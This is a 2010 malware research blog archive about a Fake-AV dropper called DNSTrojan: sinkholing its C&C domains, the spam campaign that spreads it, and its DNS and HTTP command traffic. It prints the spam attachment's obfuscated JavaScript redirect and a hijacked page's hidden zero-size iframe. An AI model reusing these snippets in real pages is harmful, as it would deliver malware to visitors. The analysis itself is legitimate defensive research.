Monthly Archives: September 2010

Mitigating the DNSTrojan Threat

A few days ago I’ve published a short analysis of a Trojan dropper which I call DNSTrojan (see New Dropper Uses DNS To Communicate). During this week I’ve tried to mitigate the threat by nuking at least some of the DNSTrojan C&C domain names by pointing them to my sinkhole.

In the first attempt I was able to redirect the traffic of the C&C servers to my sinkhole for around 9 hours. Afterwards the cybercriminals propagated a new C&C domain to the infected clients using (the infected clients regularly contacting using DNS to receive a list of C&C domains they should use).

A few hours later I was able to sinkhole the new domain name as well. Below is a chart showing the number of Apache handlers during the time the domain names have pointed to the sinkhole:

As you can see, the sinkhole had a huge server load. In totally, the C&C traffic has been redirected to my sinkhole for 10 hours. During this time I was able to count 23’000 unique IPs hitting the sinkhole. So I estimate the botnet size to 35k-50k unique IPs per day. This seems to be a huge number but in fact this isn’t a really BIG botnet (let’s compare: recently I was able to monitor a botnet which had a size of over 320’000 unique IPs per day).

Below is a chart which shows the botnet Geo location of the Trojan:

During the sinkhole action I was confronted with a unexpected problem: The botnet size wasn’t a problem but the fact that each bot queries the C&C every 30 seconds struggled my server into some performance problems. As you can see on the chart above, it ended with a downtime of the sinkhole server. In cooperation with Shadowserver I’ve now moved the domain names over to the Shadowservers sinkhole which should be able to handle that amount of requests easily.

In the last blog post I’ve published a list of C&C domains which are associated with the Trojan. Below is a updated list with additional domain names which I’ve came across so fare:

Another interesting find which I’ve made during the sinkholing action is that the cybercriminals are obviously using some kind of monitoring server. They periodically calling a PHP file called check.php on the C&C domain names to check whether the servers are still accessible: “HEAD /check.php HTTP/1.1” 200 “curl/7.18.2 (x86_64-pc-linux-gnu) libcurl/7.18.2 OpenSSL/0.9.8g zlib/ libidn/1.8 libssh2/0.18” “HEAD /check.php HTTP/1.1” 200 “curl/7.18.2 (x86_64-pc-linux-gnu) libcurl/7.18.2 OpenSSL/0.9.8g zlib/ libidn/1.8 libssh2/0.18” “

The two monitoring servers are located in Sweden and the Netherlands:

IP address:
AS number: AS49770
AS name: SERVERCONNECT-AS ServerConnect Sweden AB
Country: Sweden

IP address:
AS number: AS16265
Country: Netherlands

If we put the things together we can draw the following picture:

As shown above, the C&C servers are obviously just acting as nginx proxies which are redirecting the to the real mothership (which is currently unknown). Here is the list of nginx proxies which I’ve identified so far: | US | AS32097 | WII-KC – WholeSale Internet, Inc. | US | AS32097 | WII-KC – WholeSale Internet, Inc. | US | AS32097 | WII-KC – WholeSale Internet, Inc. | US | AS32097 | WII-KC – WholeSale Internet, Inc. | US | AS32097 | WII-KC – WholeSale Internet, Inc. | US | AS32097 | WII-KC – WholeSale Internet, Inc. | US | AS32097 | WII-KC – WholeSale Internet, Inc. | US | AS32097 | WII-KC – WholeSale Internet, Inc. | US | AS32097 | WII-KC – WholeSale Internet, Inc.

Let’s see where they are moving to during the next few days…

New Dropper Uses DNS To Communicate

During the last few weeks I’ve monitored a new Dropper which is using DNS and HTTP in combination to communicate with the Command&Control Server (C&C).

I’ve first seen the Trojan on 2010-06-08 being dropped by a well known Exploit Kit called NeoSploit. The AV detection rate is pretty good: most of the AV-vendors are currently detecting the binaries which are used to spread the Trojan as Fake-AV. As fare as what I have seen is that this Trojan is just a dropper which drops additional Fake-AV software.

Back in june when I first saw the Trojan I’ve added a signature to AMaDa. Hence AMaDa will tag the binaries and URLs which are associated with this Trojan as DNSTrojan.

In September 2010, I just saw a peak on AMaDa in new URLs propagating DNSTrojan:

Over the past days I’ve saw dozends domain names popping up which are being used to spread the Trojan (using Drive-By exploits). Here are some of them:

As already mentioned before, the Trojan is just being used to drop Fake-AV software. For now I’ve identified the following domain names which are associated with this Fake-AV campaign:

*** Spam Mails propagating the DNSTrojan ***

This week I’ve found dozens of Spam mails in my honey pots which have had a HTML file attached. Some of the subject I’ve seen so far are:

  • Consultation Appointment
  • Questions
  • Outstanding invoice – 9386 Ltd
  • Nivea commercial payment
  • Appraisal – Killington $155000
  • Re: GO HOME + SHE SAID /
  • Transaction Breakdown
  • Offer on Killington
  • Fwd: Addendum to extend close of escrow!
  • Signatures to Intercreditor
  • demands for payment
  • Mortgage Breakdown PITI
  • notes from last week
  • and many more…

The HTML files which are attached to all those spam mails contains JavaScript code:

<script type='text/javascript'>
var s="=nfub!iuuq.frvjw>#sfgsfti#!dpoufou>#1<vsm>iuuq;00cmbdlmfgjmn/dpn0y/iunm#!0?";
m=""; for (i=0; i<s.length; i++) {    if(s.charCodeAt(i) == 28){      m+= '&';}
 else if (s.charCodeAt(i) == 23) {      m+= '!';} else {      m+=String.fromCharCode(s.charCodeAt(i)-1);

Hum? Obfuscated JavaScript code. If we decode it the following HTML code appears:

<meta http-equiv="refresh" content="0;url=" />

The JavaScript coded embedded in the malicious attachment are redirecting the victim to a hijacked website which displays the following message in the web browser:

For now I’ve seen the following hijacked websites involved in this spam campaign:

The hijacked website tries to do two things:

  1. Install the ZeuS Banking Trojan using drive-By exploits (See AMaDa)
  2. Redirect the victim once again to site which is controlled by the cybercriminals to distribute DNSTrojan

The HTML source code of the hijacked websites (x.html) looks like this:

<meta http-equiv="refresh" content="4;url=" />
<iframe width="0" height="0" src=" [...]"></iframe>

Once the victim has been redirected to the site controlled by the cybercriminals, the page tries to assure the victim that his computer is infected with malware and offers him a malicious EXE-file:

The binary served by those websites contains the DNSTrojan and is being detected as “Fake-AV” by the most AV-vendors:

Filename: antivirus.exe
File size : 169984 bytes
MD5 : a00b75b0d43702d4b099548b90c715c7
SHA1 : 559a83509db3969f5207615d48fe70dcb1997bb8
VT: 33 /43 (76.7%)

As of 2010-09-21 19:00 UTC, the spam campaign is still going on.

*** The DNSTrojan ***
Let take a closer look at the Trojan which is being dropped: The Trojan installs itself into the following directories:

c:\program files\common files\microsoft shared\web folders\servemonsonsext.exe
c:\program files\common files\microsoft shared\Triedt\trieditriedit.exe
c.\program files\common files\microsoft shared\TextConv\quillmsconv97.exe

Note that the file names used by the Trojan varies. Additionally the Trojan has a interesting behavior when Apple Quick Time is installed on the victims computer: He will install itself into the Quick Time directory:

c:\program files\quicktime\pictureviewer.resources\nl.lproj\quicktimequicktime.exe
c:\program files\apple software updatesoftwareupdate.resource\it.lproj\AppleUpdate2.0.0.10.exe
c.\program files\apple software update\softwareupdate.resource\fr.lproj\AppleUpdate.exe

In a next step the Trojan contacts its first Command&Control Server which is located at But the interesting thing is that the Trojan uses DNS instead of HTTP to communicate with the C&C in the first stage:

Standard query TXT
Standard query response TXT

The Trojan is doing a DNS TXT query to every few minutes by using the current UNIX timestamp as subdomain (*unixtimestamp* C&C server replies with a encrypted string (seems to be always the same):

$ dig TXT +short

Afterwards the Trojan resolves the domain name and will contact a second C&C server located at This time the Trojan uses HTTP to communicate with the C&C:

GET /httpss/v=&step=2&hostid= HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

The C&C server will answer with a HTTP 404 (Not found) but the response also contains encrypted data anyway. I assume the cybercriminals are doing this to fool security researchers and IDS/IPS:

HTTP/1.1 404 Not Found
Server: nginx/0.7.67
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip


Last but not least the Trojan query a third C&C server located at every 30 seconds:

GET /getfile.php?r=XXXX&p= HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)

Note that the p string is a base64 encrypted string containing the values “MACHINE”, “OP” and “TRK”.

*** Conclusion ***

  • The Trojan is pretty new (first see in June 2010)
  • The detection rate on the Trojan binaries is currently pretty good
  • The Trojan uses DNS and HTTP to communicate with the C&C
  • The Trojan dropps Fake-AV software (using “getfile.php”)

I recommend you to block the access to the following domain names which are associated with DNSTrojan: ( – AS32097 WII-KC – WholeSale Internet, Inc.) ( – AS32097 WII-KC – WholeSale Internet, Inc.) ( – AS32097 WII-KC – WholeSale Internet, Inc.) –